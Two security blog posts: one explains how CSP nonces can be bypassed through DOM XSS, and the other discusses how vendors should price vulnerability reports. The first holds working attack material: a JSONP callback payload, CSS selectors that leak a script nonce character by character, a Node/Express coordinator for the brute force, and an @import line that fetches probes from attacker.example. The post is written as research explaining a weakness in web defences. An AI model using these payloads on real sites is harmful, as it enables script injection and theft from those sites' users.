Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS 🎅

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I used to be really excited about it. My excitement was high enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (and to my knowledge this was the first working CSP implementation/prototype). It supported hashes, and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted, and indeed there were so many such endpoints that I didn't see an easy way to fix this. My heart was broken.💔
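
To make the bypass concrete, here is a sketch of the kind of payload WHK described (the endpoint and parameter names are made up for illustration, and this assumes the endpoint echoes the callback back unvalidated, as many did at the time). If https://whitelisted.example/ is allowed by the policy and exposes a JSONP endpoint, an attacker who can inject HTML simply sources it with a callback of their choosing:

<script src="https://whitelisted.example/api?callback=alert(document.domain);//"></script>

The response is attacker-chosen JavaScript served from a whitelisted origin, so the policy happily lets it run.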

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016, a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out, summarizing the problems highlighted by WHK and Mario after an internet-wide survey of CSP deployments performed by Miki, Lukas, Sebastian and Artur. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral, I thought.

However, that was not it. The paper, in turn, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern with them was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made all dynamically generated script nodes work by propagating the script nonces with its dynamic resource filter. This made nonce propagation really simple. And so, this exact approach was proposed in the paper and named strict-dynamic, now with user-agent support rather than a runtime script as dominatrixss-csp was. Great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP proposed to ignore whitelists completely and rely solely on nonces. While deploying CSP nonces is harder than deploying whitelists (as it requires server-side changes on every single page with the policy), it nevertheless seemed to offer real security benefits, which were clearly lacking in the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic about this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!
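
For reference, a nonce-based policy of this kind looks roughly like the following (the nonce value is illustrative; a real one is regenerated randomly on every response):

Content-Security-Policy: script-src 'nonce-r4nd0m123' 'strict-dynamic'; object-src 'none'

<script nonce="r4nd0m123">/* runs: it carries the nonce */</script>
<script src="https://evil.example/x.js"></script> <!-- blocked: carries no nonce -->

With strict-dynamic, scripts created at runtime by already-trusted scripts (e.g., via document.createElement('script')) are also allowed to run, which is what makes nonce propagation manageable.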

But this Christmas, as if it were a piece of coal from Santa, Sebastian Lekies pointed out what, in my opinion, seems to be a significant blow to CSP nonces, almost completely making CSP ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-year-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written nowadays, and how that differs from 2002.

Before, most of the application logic lived on the server, but over the past decade it has been moving more and more to the client. Nowadays, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This, among other things, allows for making web applications offline-ready, and provides access to an endless supply of powerful web APIs.

Newly developed applications still have XSS; the difference is that, since a lot of the code is written in JavaScript, now they have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (non-exhaustive list, of course) of DOM XSS bugs that are common and CSP nonces alone can't defend against:
  1. Persistent DOM XSS, when the attacker can force navigation to the vulnerable page and the payload is not included in the cached response (so it needs to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (e.g., fetch(location.pathname).then(r=>r.text()).then(t=>document.body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (e.g., https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I gave a small presentation at Microsoft BlueHat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 in their 25C3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character by character, simply by generating an HTTP request every time a CSS selector matches, and repeating consecutively. If you haven't seen this working, take a look here. The way it works is very simple; it just creates CSS attribute selectors of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute. For a 64-character base64 alphabet and a 24-character nonce, for instance, that is at most 64 × 24 = 1,536 selectors in total, so the attack is quite cheap.

The attack for script tags is very straightforward. We do the exact same attack, with the only caveat being that the script tag must be set to display: block; so that its background image actually loads.
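
Applied to a script tag carrying a nonce, the probes look like this (same hypothetical record endpoint as above):

script{display:block;}
script[nonce^="a"]{background:url("record?match=a")}
script[nonce^="b"]{background:url("record?match=b")}
[...]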

So, we can now extract a CSP nonce using CSS, and the only thing we need in order to do so is the ability to inject multiple times into the same document. The three examples of DOM XSS I gave you above permit exactly that: a way to inject an XSS payload multiple times into the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is particularly troubling, because if, in "the new world", developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean by that is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern allows you to control the way applications load progressively, it also makes it so that loading the same document twice can return different data each time.

Now, of course, the question is: how do you force the document to load twice!? With the HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on Twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example: let's take the default Guestbook example from the App Engine getting started guide, with a few modifications that add AJAX support and CSP nonces. The application is simple enough, and it is vulnerable to an obvious XSS, but that is mitigated by CSP nonces. Or is it?

The application above has a very simple persistent XSS. Just submit an XSS payload (e.g., <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you can't actually execute JavaScript because of the CSP nonce.

Now, let's do the attack. To recap, we will:

  1. Steal the CSP nonce with the CSS attribute reader.
  2. Inject an XSS payload carrying the stolen CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the brute-forcing. You can find the code here, and you can run it by clicking the buttons above.
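
If you want a feel for what that server-side code has to do, here is a minimal sketch of the coordinator in Node/Express (the endpoint names, port and charset are illustrative assumptions, not the actual PoC code). It serves one round of CSS probes for the prefix recovered so far, and records which probe fired:

// Hypothetical brute-force coordinator: serves CSS probes, records matches.
const express = require('express');
const app = express();

const CHARSET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/-_';
let known = ''; // nonce prefix recovered so far

// One round of probes: one attribute selector per candidate next character.
app.get('/probe.css', (req, res) => {
  const rules = [...CHARSET].map(c =>
    `script[nonce^="${known + c}"]{display:block;background:url("/record?prefix=${encodeURIComponent(known + c)}")}`
  );
  res.type('text/css').send(rules.join('\n'));
});

// A probe matched: remember the longer prefix for the next round.
app.get('/record', (req, res) => {
  known = req.query.prefix;
  res.status(204).end();
});

app.listen(3000);

Each injection into the victim page then pulls in the current round, for example with <style>@import url("//attacker.example:3000/probe.css");</style> (assuming the policy doesn't also lock down style-src), and the loop repeats until known holds the full nonce. The relative /record URL resolves against the stylesheet's origin, so the matches land on the attacker's server.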

If all worked well, after clicking "Inject the XSS payload" you should have received an alert. Isn't that nice? =) In this case, the cache we are using is the BFCache, since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness in CSP nonces. Sebastian demonstrated the same issue with postMessage. Another pattern that is also problematic is XSS through HTTP "inclusion". This is a fairly common DOM XSS vulnerability that simply consists of fetching some user-supplied URL and echoing the response back into innerHTML. It is the JavaScript equivalent of Remote File Inclusion. The exploit is exactly the same as the others.
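
Spelled out, the vulnerable pattern looks something like this (the parameter name is made up):

const page = new URLSearchParams(location.search).get('page');
fetch(page).then(r => r.text()).then(html => {
  document.body.innerHTML = html; // attacker-controlled HTML; injected scripts lack the nonce
});

Since the attacker controls the fetched content, they control what gets injected on every load, which is exactly the repeated-injection primitive the CSS brute-forcer needs.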

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe the reason is IE quirks, but many websites have to use the location hash to implement history and navigation in single-page JavaScript clients. The pattern even has a nickname: "hashbang". In fact, this is so common that every single website using jQuery Mobile has this "feature" enabled by default, whether they like it or not.
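
A typical vulnerable hashbang router boils down to something like this (a simplified, hypothetical sketch, not jQuery Mobile's actual code):

window.addEventListener('hashchange', () => {
  // whatever follows "#!" is treated as the route and rendered as HTML
  const route = decodeURIComponent(location.hash.slice(2));
  document.getElementById('page').innerHTML = route; // DOM XSS sink
});

Crucially, hashchange fires without reloading the page, so the attacker can deliver a new payload round after round into the same document, while the same nonce stays valid.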

Essentially, any website that uses the hashbang for internal navigation is as vulnerable to reflected XSS as if the CSP nonces weren't there to begin with. How crazy is that! Take a look at the PoC here (Chrome only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post... but at least I hope you found it useful, and hopefully now you understand a bit better the real effectiveness of CSP, maybe learned a few browser tricks, and hopefully got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. Its coverage and effectiveness are even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up on CSP. 💩
I don't think we should give up... but I also can't stop wondering whether all the effort we spend on CSP could be better used elsewhere - especially since this mechanism is so fragile that it runs the real risk of creating an illusion of security where none exists. And I don't think I'm alone in this assessment... I guess time will tell.

Anyway, happy holidays, everyone, and thank you for reading! If you have any feedback or comments, please comment below or on Twitter!

Hasta luego!

Saturday, December 10, 2016

Vulnerability Pricing

What is the right price for a security vulnerability?

TL;DR: Vendors should focus on vulnerabilities, not on exploits. Vulnerabilities should be priced based on how difficult they are to find, not just on their exploitability.

I've been searching for an answer to this question for a while now, and this blog post is my attempt at answering it, from my personal point of view.

The first answer comes from the economics of the security researcher's perspective. Given that vendors run bug bounties as a way to interact with and give back to the security community, the rewards are mostly aimed at compensation and appreciation. As a result, for these researchers, getting 5k USD for what they did over a few days as a research project or personal challenge is pretty neat.

In contrast, in the "grey market" of those looking for vulnerabilities in order to exploit them (let's call them "exploiters"), the priorities are focused on vulnerability reliability and stability.

As an "exploiter", you want good, simple, dumb, reliable bugs. For bug hunters, finding these *consistently* is difficult. It's not about giving yourself the challenge of finding a bug in Chrome this month; rather, you seek to build a pipeline of new bugs every month and, if possible, even grow that pipeline over time. This is far more expensive than "bug hunting for fun".

Now, of course, there is an obvious profit opportunity here. Why not buy the bugs from the security researchers that find them in their spare time for fun, and resell them to "exploiters" for 10x the price? Well, that happens! Bug brokers do precisely that. As a result, the prices from these "bug brokers" are limited only by how much the "exploiters" are willing to pay for them (which is a lot; more on that below).

However, and very importantly, we haven't discussed the cost of going from vulnerability to exploit. Depending on the vulnerability type, that might be either trivial (for some design/logic flaw issues) or very difficult (for some memory corruption issues).

Now, surprisingly, this key difference might give vendors a fighting chance. Software vendors, in their mission to make their software better, actually don't care (or at least shouldn't care) about the difficulty of writing a reliable exploit. Vendors want the vulnerability so they can fix it, learn from it, and find ways to prevent it from happening again.

This means that a software vendor can extract value from a vulnerability immediately, while turning it into an exploit and selling it to those who want to use it would require a significant amount of additional research and effort whenever there are a lot of mitigations along the way (sandboxes, isolation, etc.).

So, it seems that the vendor's best chance in the "vendor" vs. "exploiter" competition is twofold: (1) focus on making exploits harder and more expensive to write, and (2) focus on making vulnerabilities as profitable to find and report as possible, with the goal that eventually the cost of "weaponizing" a vulnerability is higher than the cost of finding the next bug.

The second answer to this question comes from the economics of the "exploiters'" and the vendors' perspectives.

For the vendors, software engineering is so imperfect that if you have a large application, you will have a lot of bugs, and the more you code, the more you will introduce.

So for software vendors, learning of a lot of vulnerabilities isn't as valuable as preventing that many from being introduced in the first place. In other words, being notified of a vulnerability is not useful unless that knowledge is used to prevent the next one from happening.

Prices (for vendors) should then, first of all, be set to match the volume of reports the vendor can handle, covering not just the response but also the corresponding remediation work. So if a vendor has two full-time engineers staffed to respond to security vulnerabilities, prices should be set so that the reports they attract consume approximately those two engineers' time.

And then, on top of that, as many engineering resources as possible should be focused on prevention (to make vulnerabilities harder to introduce), on optimizing processes (to be able to handle a larger number of reports), and finally on making exploits harder to write (to make finding the next bug cheaper than writing an exploit).

For the "exploiters", if they didn't have these vulnerabilities, their alternative would be dangerous and expensive human intelligence operations: bribing, spying, interrogating, sabotaging, etc. All of these are expensive and limited by the number of people you can train, the number of assets you can turn, the amount of money they will ask for, and your ability to keep all of this secret. Human intelligence is really very expensive.

On the other hand, they could use these security holes - super attractive capabilities that allow them to spy on those they want to spy on, reducing (or sometimes eliminating) the need for any of the human intelligence operations and their associated risks. How can it get better than that?

So they have the budget and the ability to pay large sums of money. However, the vulnerability market isn't efficient enough for those larger prices to matter as much as they should.

What this market inefficiency means is that if someone can make $X00,000 a year just by finding vulnerabilities (ignoring exploit writing), then spending a month or two writing a reliable exploit carries the opportunity cost of all the vulnerabilities that would have been found in that time. Vendors should be able to take advantage of this opportunity.

In conclusion, it seems to me that the optimal way for vendors to price vulnerabilities is based on:
(1) Identifying those vulnerabilities in the critical path of an exploit.
(2) Ignoring mitigations as much as possible for the purpose of vulnerability reward decisions.

And that will only have the intended effect if:
(a) Vendors make a proper investment in remediation, prevention and mitigation, as otherwise one doesn't get any value out of buying these vulnerabilities.
(b) Our reliance on requiring full PoCs from security researchers changes, if we want to get vulnerabilities in order to learn from them.

Thank you for reading, and please comment below or on Twitter if you disagree with anything or have any comments.